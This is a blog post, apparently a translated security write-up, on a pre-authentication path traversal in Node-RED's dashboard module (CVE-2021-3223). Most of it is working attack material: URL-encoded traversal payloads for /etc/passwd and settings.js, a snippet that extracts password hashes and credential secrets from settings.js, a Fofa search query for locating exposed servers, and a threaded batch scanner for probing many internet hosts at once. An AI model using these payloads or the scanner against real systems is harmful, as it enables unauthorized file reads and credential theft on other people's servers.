Node-RED Arbitrary File Read

Node-RED pre-auth arbitrary file read

In /nodes/ui_base.js (part of the node-red-dashboard module), the request URL is matched against the '/ui_base/js/*' route and the matched portion is passed to path.join.
Because the resulting path is never validated, this leads to a path traversal vulnerability (CVE-2021-3223) that can be used to read sensitive files on the server, such as settings.js.
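The root cause is easy to see with an analogous sketch in Python (the vulnerable code itself is Node.js path.join, but posixpath behaves the same way for this purpose): once the encoded ../ sequences are decoded and the joined path is normalized, the result escapes the intended base directory.

from urllib.parse import unquote
import posixpath

# Encoded payload that still matches the '/ui_base/js/*' route
payload = "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

decoded = unquote(payload)                        # '../../../../../../../../../../etc/passwd'
joined = posixpath.join("/ui_base/js/", decoded)  # what the handler effectively builds
print(posixpath.normpath(joined))                 # -> '/etc/passwd', outside the intended base directory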

Vulnerability reproduction: Fofa

title="Node-RED"

Open a matched target in the browser, then verify the PoC:

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
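If the target is vulnerable, the response contains the contents of /etc/passwd. A minimal verification sketch with requests (the target URL below is a placeholder assumption; 1880 is Node-RED's default port):

import requests

target = "http://127.0.0.1:1880"  # placeholder; replace with a host found via Fofa
poc = "/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

resp = requests.get(target + poc, verify=False, timeout=5)
if "root:x:0:0" in resp.text:
    print("[+] Vulnerable:", target)
    print(resp.text)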

Read the configuration file (settings.js):

/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
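settings.js normally lives in the Node-RED user directory rather than at the filesystem root, hence the shallower traversal. It is worth retrieving because it typically holds the adminAuth password hash and the credentialSecret used to encrypt flow credentials. A small sketch along the same lines as above (target is again a placeholder):

import requests

target = "http://127.0.0.1:1880"  # placeholder target
poc = "/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"

resp = requests.get(target + poc, verify=False, timeout=5)
# Print only the lines most likely to contain secrets
for line in resp.text.splitlines():
    if "credentialSecret" in line or "adminAuth" in line or "password" in line:
        print(line.strip())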

Scanner script

For batch verification: there are far too many exposed instances to check by hand, so, in short, here is the script.


import argparse
import ssl
import sys
import threading
import urllib.request

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()


def banner():
    print("""
// /$$$$$$ /$$ /$$ /$$ /$$
// /$$__ $$ | $$ | $$ | $$ | $$
// | $$ \__/ /$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$$ /$$$$$$$
// | $$$$$$ | $$ | $$ | $$ /$$__ $$ /$$__ $$ /$$__ $$ | $$$$$$$$ |____ $$| $$__ $$ /$$__ $$
// \____ $$| $$ | $$ | $$| $$ \ $$| $$ \__/| $$ | $$ | $$__ $$ /$$$$$$$| $$ \ $$| $$ | $$
// /$$ \ $$| $$ | $$ | $$| $$ | $$| $$ | $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$
// | $$$$$$/| $$$$$/$$$$/| $$$$$$/| $$ | $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$| $$$$$$$
// \______/ \_____/\___/ \______/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ \_______/
//
//
//
""")
    print('''
    Node-RED Arbitrary File Read \n
    Author: 孤桜懶契 \n
    Fofa query: title="Node-RED" \n
    Batch check: python3 xxx.py -f/--file target.txt \n
    Blog: gylq.gitee.io \n
    WeChat official account: 渗透安全团队
    ''')


# Check whether the target is vulnerable
def check(target_url):
    scan_url = target_url + "/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
    # All requests are routed through a local proxy (e.g. Burp on 127.0.0.1:8080);
    # remove the next three statements if no proxy is running.
    proxy_support = urllib.request.ProxyHandler({
        "http": "http://127.0.0.1:8080",
        "https": "http://127.0.0.1:8080"
    })
    opener = urllib.request.build_opener(proxy_support)
    urllib.request.install_opener(opener)
    try:
        try:
            request = urllib.request.urlopen(scan_url)
            content = request.read().decode('utf-8')
        except Exception:
            # Retry without certificate verification for HTTPS targets
            request = urllib.request.urlopen(scan_url, context=ssl._create_unverified_context())
            content = request.read().decode('utf-8')
        if 'root:x:0:0:root' in content:
            print("[+] Arbitrary file read found: {}".format(scan_url))
            print("[+] Response content: \n", content)
            with open("Node-RED.txt", "a+") as a:
                a.write("[+] Arbitrary file read found: {}\n".format(scan_url))
    except Exception:
        print("[*] Connect Timeout!")


# Normalize the URL format
def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
        url = url.strip()
        return url
    except Exception:
        print('URL error: {0}'.format(url))


# Main routine: read the target list and scan it with worker threads
def main():
    parser = argparse.ArgumentParser(description='Node-RED arbitrary file read batch scanner')
    parser.add_argument('-f', '--file', help='Please input a url.txt!', default='')
    args = parser.parse_args()

    with open(args.file, "r") as f:
        targets = f.read().split("\n")

    i = 0
    while True:
        if i < len(targets) and threading.active_count() <= 1000:  # cap the number of worker threads
            if targets[i].strip() != '':  # skip empty lines
                url_target = format_url(targets[i].strip())  # normalize the URL
                t = threading.Thread(target=check, args=(url_target,))
                t.start()
            i += 1
            print("[*] Progress:", i, "/", len(targets))
        if i == len(targets) and threading.active_count() == 1:
            print("[*] done, results written to \"Node-RED.txt\"!")
            break


# Deduplicate lines in a result file (helper, not called by default)
def remove_duplicates(path):
    lines_seen = set()
    outfile = open(f"{path}.out", 'a+')
    f = open(path, 'r')
    for line in f:
        if line not in lines_seen:
            outfile.write(line)
            lines_seen.add(line)
    outfile.close()
    f.close()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        banner()
        sys.exit()
    banner()
    main()

Title: Node-RED Arbitrary File Read

Author: 孤桜懶契

Published: 2021-12-24 09:10:54

Last updated: 2022-05-24 21:00:57

Original link: http://gylq.gitee.io/time/posts/7.html

License: CC BY-NC-ND 4.0 International (Attribution-NonCommercial-NoDerivatives). Please keep the original link and author attribution when reposting.
